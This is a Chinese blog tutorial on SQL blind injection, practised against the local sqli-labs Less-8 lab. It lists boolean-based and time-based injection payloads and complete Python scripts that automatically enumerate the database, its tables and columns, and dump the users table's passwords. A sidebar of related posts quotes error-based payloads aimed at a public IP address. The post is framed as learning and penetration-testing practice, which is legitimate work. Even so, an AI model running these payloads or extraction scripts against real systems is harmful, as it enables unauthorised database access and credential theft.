sql注入漏洞之sql盲注

最新推荐文章于 2023-06-12 18:20:12 发布
最新推荐文章于 2023-06-12 18:20:12 发布
阅读量626 收藏 2
点赞数 1
文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45859850/article/details/108737988
版权

SQL 盲注方法总结

1.布尔盲注 (构造逻辑判断)

建议使用HackBar
在这里插入图片描述

即可以根据返回页面判断真假的注入

?id=1' and 1=1 --+

页面正常
在这里插入图片描述

?id=1' and 1=2 --+

页面异常
在这里插入图片描述

1.用盲注获取数据库长度

01.判断数据库长度

?id=1' 9>length(database())--+

在这里插入图片描述

在这里插入图片描述
与判断回显同理,得到当前数据库长度为8

?id=1' and 8=length(database()) --+

在这里插入图片描述

2.依次获取数据库数据

例:判断当前数据库第一个字符
①left(database(),1)

left(a,b) 表示从左侧截取a的前b位

?id=1' and 's'=left(database(),1) --+

表示从数据库名字第一个字母是否等于s,是则返回true
在这里插入图片描述
前连个字母是否为’se’

1' and 'se'=left(database(),2) --+

在这里插入图片描述

②ascii(substr())=n

substr(a,b,c) 截取字符串a,从b位置开始,截取长度为c。
Ascii()将某个字符转换为ascii值

判断第一个字符的ascii为115(s)

?id=1' and 115=ascii(substr(database(),1,1)) --+

在这里插入图片描述

3.获取数据表个数

与union select 方法雷同,只是多了一个判断并用循环测试读取数据

查询数据表的个数

select count(table_name) from information_schema.tables where table_schema="security";

利用盲注获取数据表的个数

?id=1' and 5>(select count(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述
在这里插入图片描述
得到 该数据库中有四个数据表
在这里插入图片描述

4.获取数据库的第一个表的第一个字符

第一个表第一个字符为’e’
limit 0,1 表示查询第一个表
limit 1,1 表示查询第二个表
limit 0,2 表示查询前俩个表
substr(a,1,1) a表的第一个字符
substr(a,2,1) a表的第二个字符
substr(a,1,2) a表的前俩个字符

?id=1' and 'e'=substr((select table_name from information_schema.tables where table_schema='security' limit 0,1) ,1,1) --+

在这里插入图片描述
第一个表第二个字符为’m’

?id=1' and 'm'=substr((select table_name from information_schema.tables where table_schema='security' limit 0,1) ,2,1) --+

在这里插入图片描述

举一反三得到第一个表为emails。

第二个表第一个字符

?id=1' and 'm'=substr((select table_name from information_schema.tables where table_schema='security' limit 1,1) ,1,1) --+

5.获取表的第一个字段的第一个字符

同获取数据表的第一个字符
查询字段的个数

?id=1' and 2=(select count(column_name) from information_schema.columns where table_schema='security' and table_name='emails') --+

字段数为2
在这里插入图片描述
获取第一个字段的第一个字符

?id=1' and 'i'=substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1) --+

第一个字符为’i’
在这里插入图片描述
第一个字段第二个字符

?id=1' and 'd'=substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),2,1) --+

第二个字符为 ‘d’
在这里插入图片描述

6.获取字段中的数据

首先判断内容的条数

select count(`id`) from security.emails;

id字段中第一条数据第一个字符

?id=1' and 1=substr((select `id` from security.emails limit 0,1),1,1) --+

在这里插入图片描述
至此,整个基于布尔型的盲注的过程结束

# sqli-lib-less8 sql盲注
'''
#分步代码
#爆表
import requests
url = 'http://127.0.0.1:81/Less-8/?id=1'
for a in range(5):    #第几个表
    flag = ''
    for b in range(1,10):   #表中的字符
        #print(b)
        for c in range(1,129):  #ascii码
            #print(c)
            payload = url + "\' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit {0},1),{1},1)) = {2},1,0) --+".format(a,b,c)
            rq = requests.get(payload)
            #print(rq.text)
            if 'You are in' in rq.text:
                flag = flag + chr(c)
                #print("第{}个表的名为{}".format(a,flag))
                break
    print("第{}个表的名为{}".format(a+1,flag))

#爆字段
import requests
url = 'http://127.0.0.1:81/Less-8/?id=1'
for a in range(5):    #第几个字段
    flag = ''
    for b in range(1,10):   #字段字符位
        #print(b)
        for c in range(1,129):  #ascii码
            #print(c)
            payload = url + "\' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit {0},1),{1},1)) = {2},1,0) --+".format(a,b,c)
            rq = requests.get(payload)
            #print(rq.text)
            if 'You are in' in rq.text:
                flag = flag + chr(c)
                #print("第{}个表的名为{}".format(a,flag))
                break
    print("第{}个字段的名为{}".format(a+1,flag))

#爆内容
import requests
url = 'http://127.0.0.1:81/Less-8/?id=1'
for a in range(15):    #第几条记录
    flag = ''
    for b in range(1,10):   #记录位
        #print(b)
        for c in range(1,129):  #ascii码
            #print(c)
            #payload = url + "\' and if(ascii(substr((select username from users limit {0},1),{1},1)) = {2},1,0) --+".format(a,b,c)
            payload = url + "\' and if(ascii(substr((select password from users limit {0},1),{1},1)) = {2},1,0) --+".format(a,b,c)
            rq = requests.get(payload)
            #print(rq.text)
            if 'You are in' in rq.text:
                flag = flag + chr(c)
                #print("第{}个表的名为{}".format(a,flag))
                break
    print("第{}条记录:{}".format(a+1,flag))
'''
#集合代码 可以爆出数据库,数据表,字段
import requests                                     # 导入request模块

def db_length():
    #数据库长度
    length = ""
    for a in range(1,10):   
        #print(a)
        payload = url + '\' and length(database()) <= {} --+'.format(int(a))
        r = requests.get(payload)                           # 也可以用长度进行判断
        if 'You are in' in r.text:     # if(len(r.text)==)
            length = a
            break
    print('数据库长度:',a)        
    return length
def db_name(db_length):
    #爆数据库名       
    db_name = ''                                                   
    for a in range(1,db_length+1):                                        #遍历 数据库名的每一位
        for b in range(1,129):                                  #每位字符的ascii
            payload = url + '\' and if (ascii(substr(database(),{0},1))={1},1,0) --+'.format(a,b)
            r = requests.get(payload)                           # 也可以用长度进行判断
            if('You are in' in r.text):     # if(len(r.text)==)
                db_name = db_name + chr(b)
                #print('数据库名为',db_name)
                break
    print('数据库名为',db_name)
    return db_name

def tb_nums(db_name):
    #数据表数
    tb_num = 0
    for i in range(1,10):
        payload = url + '\' and (select count(table_name) from information_schema.tables where table_schema = database()) = {} --+'.format(i)
        #print(payload)
        r = requests.get(payload)
        if 'You are in' in r.text:     # if(len(r.text)==)
            tb_num = i
    print('数据表数:{}'.format(tb_num))
    return tb_num

def tb_name_length(db_name,tb_num):       #数据库名,数据表数
    #所有数据表长度 返回一个列表
    ls = []
    for a in range(1,tb_num+1): 
        for b in range(1,10):  
            #print(a)
            #print(b)
            payload = url + '\' and (select length(table_name) from information_schema.tables where table_schema=\'{}\' limit {},1) = {} --+'.format(db_name,a-1,b)
            #print(payload)
            r = requests.get(payload)                           # 也可以用长度进行判断
            if 'You are in' in r.text:     # if(len(r.text)==)
                ls.append(b)
                break
            #print(ls)
        print('第{}个数据表长度:{}'.format(int(a),ls[int(a)-1]))
    return ls

def tb_names(db_name,tb_num,tb_num_length):         #传入数据库名 数据表个数 所有数据表长度的列表
    #数据表名
    ls = []                      #返回所有数据表名放入列表中
    for a in range(0,tb_num):    #第几个表
        flag = ''
        x = tb_num_length[a]
        for b in range(1,int(x)+1):   #表的字符位
            #print(b)
            for c in range(1,129):  #ascii码
                #print(c)
                payload = url + "\' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{}' limit {},1),{},1)) = {},1,0) --+".format(db_name,a,b,c)
                rq = requests.get(payload)
                #print(rq.text)
                if 'You are in' in rq.text:
                    flag = flag + chr(c)
                    #print("第{}个表的名为{}".format(a+1,flag))
                    break
        print("第{}个表的名为{}".format(a+1,flag))
        ls.append(flag)
    return ls
    
def cl_nums(db_name,tb_name_list):       #数据库名,所有数据表
    #根据数据表依次返回对应字段个数 返回一个列表
    ls = []
    for a in tb_name_list:         #表名
        for b in range(1,10):        #字段个数
            payload = url + "\' and (select count(column_name) from information_schema.columns where table_schema='{}' and table_name='{}') = {} --+".format(db_name,a,b)
            #print(payload)
            r = requests.get(payload)                           # 也可以用长度进行判断
            if 'You are in' in r.text:     # if(len(r.text)==)
                ls.append(b)
                break
        print('数据表{}字段数:{}'.format(a,ls[tb_name_list.index(a)]))
    #print(ls)
    return ls

def cl_name_dict(db_name,tb_name_list,tb_nums,cl_nums):       #数据库名,所有数据表
    #根据数据表依次返回对应字段 返回一个字典
    d = {}
    for i in range(tb_nums):     #表数   表名:tb_name_list[i]
        flag = ''
        for a in range(cl_nums[i]):      #字段
            for b in range(1,10):    #字符 
                for c in range(1,128):     #ascii
                    payload = url + "\' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1)) = {},1,0) --+".format(db_name,tb_name_list[i],a,b,c)
                    #print(payload)
                    r = requests.get(payload)                           # 也可以用长度进行判断
                    if 'You are in' in r.text:     # if(len(r.text)==)
                        flag += chr(c)
                        break
            flag += ','
        d[tb_name_list[i]] = flag
        print('数据表{}:字段{}'.format(tb_name_list[i],d[tb_name_list[i]]))
    #print(d)
    return d

if __name__ == '__main__':
    global url
    url = 'http://127.0.0.1:81/Less-8/?id=1'
    db_length = db_length()                      
    db_name = db_name(db_length)                             #数据库长度变量 传入 数据库名称函数

    tb_num = tb_nums(db_name)                                #数据表数量
    tb_length_list = tb_name_length(db_name,tb_num)          #返回一个列表(所有表长度)给tb_length_list
    tb_name_list = tb_names(db_name,tb_num,tb_length_list)   #返回一个列表(所有表长度)给tb_name_list

    cl_num = cl_nums(db_name,tb_name_list)                            #返回一个列表(所有表对应的字段数)给tb_name_list
    cl_name_dict(db_name,tb_name_list,tb_num,cl_num)         #返回一个字典(表对应的字段)
'''
#爆内容   利用已知数据库、数据表、字段
import requests
url = 'http://127.0.0.1:81/Less-8/?id=1'
for a in range(15):    #第几条记录
    flag = ''
    for b in range(1,10):   #记录位
        #print(b)
        for c in range(1,129):  #ascii码
            #print(c)
            #payload = url + "\' and if(ascii(substr((select username from users limit {0},1),{1},1)) = {2},1,0) --+".format(a,b,c)
            payload = url + "\' and if(ascii(substr((select password from users limit {0},1),{1},1)) = {2},1,0) --+".format(a,b,c)
            rq = requests.get(payload)
            #print(rq.text)
            if 'You are in' in rq.text:
                flag = flag + chr(c)
                #print("第{}个表的名为{}".format(a,flag))
                break
    print("第{}条记录:{}".format(a+1,flag))
'''

在这里插入图片描述

2.时间盲注

即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
这里我们需要打开浏览器的控制台,点网络选项进行查看

?id=1' and sleep(5) --+

如何获取数据?其实就是在盲注的基础上加了个if语句
例如测试当前数据库的字符数

?id=1' if(length(database())=8,sleep(5),0)--+

在这里插入图片描述

如果当前数据库字符数为8 页面就是延迟5s 否则 返回0

如何获取数据?其实很简单,就是在布尔盲注的基础上加了个if语句

?id=1' and if(115=ascii(substr(database(),1,1)),sleep(5),0)--+

在这里插入图片描述

3.基于报错注入

#_##
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入漏洞原理分析
06-21
SQL注入漏洞原理分析
SQL注入进阶:掌握布尔盲注和延时注入攻击技巧
weixin_43263566的博客
01-21 3702
SQL注入篇 - 布尔盲注及延时注入
SQL中EXISTS的用法
ChineseSoftware的博客
12-02 2512
一、引言 select a.pid,a.pname FROM person a where exists( select b.oid FROM Orders b where b.oid = a.pid) 此时 EXISTS 是如何执行的呢?子查询返回的是 oid 字段,而外面的查询要找的是 pid 和 pame 字段,这两个字段肯定不在 oid 里面啊,这是如何匹配的呢? EXISTS 用于检查子查询是否至少会返回一行数据,该子查询实际上并不返回任何数据,而是返回值 true/false。EXISTS
sql学习笔记(第六章)
qq_43787862的博客
03-24 227
第六章 函数,谓词,CASE表达式 6-1 各种函数 SQl中的函数就是输入某一个数值得到相应输出结果的功能,其中输入值称为参数,输出值称为返回值. 函数主要可以分为算术函数,字符串函数,日期函数,转换函数和聚合函数几类. 算术函数 ABS函数(求绝对值) MOD函数(求余数),只能对整数使用,语法如下: MOD(被除数,除数) ROUND函数(完成四舍五入操作),语法如下: ROUND...
SQL注入漏洞
qq_43279943的博客
03-31 386
SQL注入漏洞漏洞原理注入类型漏洞检测单引号测试 漏洞原理 SQL注入是由于编辑代码的人员对用户提交参数没有进行一定的审核或者过滤机制不严格,导致用户可以对SQL语句进行重新构造,执行不在预期内的数据库命令,造成数据信息泄露的漏洞。 注入类型 SQL注入按照注入点参数分类通常分为字符型和数字型 字符型:select * from users where id = '1'; 数字型:select *...
SQL注入漏洞——sql盲注
xiaoheizi的博客
06-12 344
sleep(5) #SQL语句延时执行5秒 substr(a,b,c) #从位置b开始,截取字符串a的c长度 left(database(),1) #left(a,b)从左侧截取a的前b位 length(database())=8 #判断数据库database()名的长度
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
Access 偏移注入:解决列名获取不到的情况查看登陆框源代码的表单值或观察 URL 特征等也可以针对表或列获取不到的情况select 查询数据在网站应用中进行
10个SQL注入工具
03-02
以下罗列的10款SQL注入工具可帮助管理员及时检测存在的漏洞。BSQLHacker是由Portcullis实验室开发的,BSQLHacker是一个SQL自动注入工具(支持SQL盲注),其设计的目的是希望能对任何的数据库进行SQL溢出注入。...
SQL盲注攻击的简单介绍
12-14
Stephen Kost[3]给出了这种攻击形式的另一个特征,“从一个数据库获得未经授权的访问和直接检索”,SQL注入攻击其本质而言,它利用的工具是SQL的语法,针对的是应用程序开发者编程过程中的漏洞,“当攻击者能够操作...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
史上最详细的SQL盲注入门教程
weixin_44867191的博客
05-16 1254
正常情况下,用户输入用户名id,就能查到用户信息,但是如果攻击者输入的内容是:666' or '1'='1,那么查询的SQL语句就变成SELECT name,age FROM users WHERE user_id = '666' or '1'='1',由于1=1恒成立,就会执行SQL,执行后,就会返回所有的学生信息,有回显信息,这就是典型的。如果执行SQL后,应用程序不显示任何具体的数据,可能只是告诉我们查询成功或者查询失败,或者什么都不说,没有回显,但是SQL还是执行了,SQL注入发生了,这就是。
SQL注入漏洞(union + 盲注
m0_61506558的博客
09-16 1526
数据库漏洞一直处于OWASP前几名,虽然在2021年滑到第三,漏洞的危害是不言而喻的,数据库可以分为两种:关系型数据库:关系型数据库,存储的格式可以直观地反映实体间的关系。关系型数据库和常见的表格比较相似, 关系型数据库中表与表之间是有很多复杂的关联关系的。常见的关系型数据库有 MySQL,Oracle, PostgreSQL,SQL Server等。
sql注入盲注漏洞
热门推荐
liuy_uzhi的博客
07-24 1万+
1、发现和利用sql注入漏洞的基本流程: 首先找到有数据库交互的功能页面---判断页面是否存在sql注入--利用sql注入漏洞读取数据--导出所需数据 sql 注入的基本步骤(这个跟sqlmap的步骤基本一致吧) (1)判断是什么类型注入,有没过滤了关键字,可否绕过 (2)获取数据库用户,版本,当前连接的数据库等信息 (3)获取某个数据库表的信息 (4)获取列信息 (5)最后就获取数据了 2...
Sql漏洞注入之盲注
Matheus的博客
07-22 514
盲注(Boolean盲注、时间盲注) 布尔(Boolean)盲注 1 布尔注入 有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为boolean型盲注和时间型盲注。 Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean型盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。 2 布尔盲注
SQL布尔盲注漏洞
weixin_45007073的博客
02-19 559
原理 目前常用的SQL盲注主要有以下两类: 基于布尔的盲注: 当页面没有回显位、不会输出SQL语句报错信息时,通过返回页面响应的正常或不正常的情况来进行注入。 基于时间的盲注: 当页面没有回显位、不会输出SQL语句报错信息时,不论SQL语句的执行结果对错都返回一样的页面时,通过页面的响应时间进行注入。 缺点: 两种盲注方式都需要耗费大量的精力去进行测试,因此在渗透测试过程中常使用工具(sqlmap)或脚本来代替手工操作。 以下我们将使用sqli-labs-Less8靶场进行操作和演示,注入成功则会显示"
SQL注入漏洞测试(报错盲注)
qq_36933272的博客
08-31 1115
1.判断注入,输入’显示语法错误说明有注入点 2.爆数据库 http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+ 3.爆表 http://219.153.49.228:44996/new_list.php?id=1’ and updatexm...
墨者学院SQL注入漏洞测试(布尔盲注)
痴人说梦梦中人
11-13 442
1、 使用SQLmap,爆库,爆表,爆列,dump,md5解密获得密码登陆,获取key 2、 爆库 爆表 爆列 Dump Md5解密: 登陆获取key 3.修复建议 对sql语句进行以下处理: 1、 sql语句预编译 2、 检查变量数据类型和格式 3、 过滤特殊字符 4、 转译特殊符号 ...
burpsuite sql注入漏洞测试(布尔盲注)
最新发布
07-27
当使用Burp Suite进行SQL注入漏洞测试时,布尔盲注是一种常用的技术之一。布尔盲注是一种盲注攻击技术,它通过在SQL查询中使用布尔逻辑来确定数据库中的信息。以下是一些步骤来测试布尔盲注漏洞: 1. 配置Burp ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值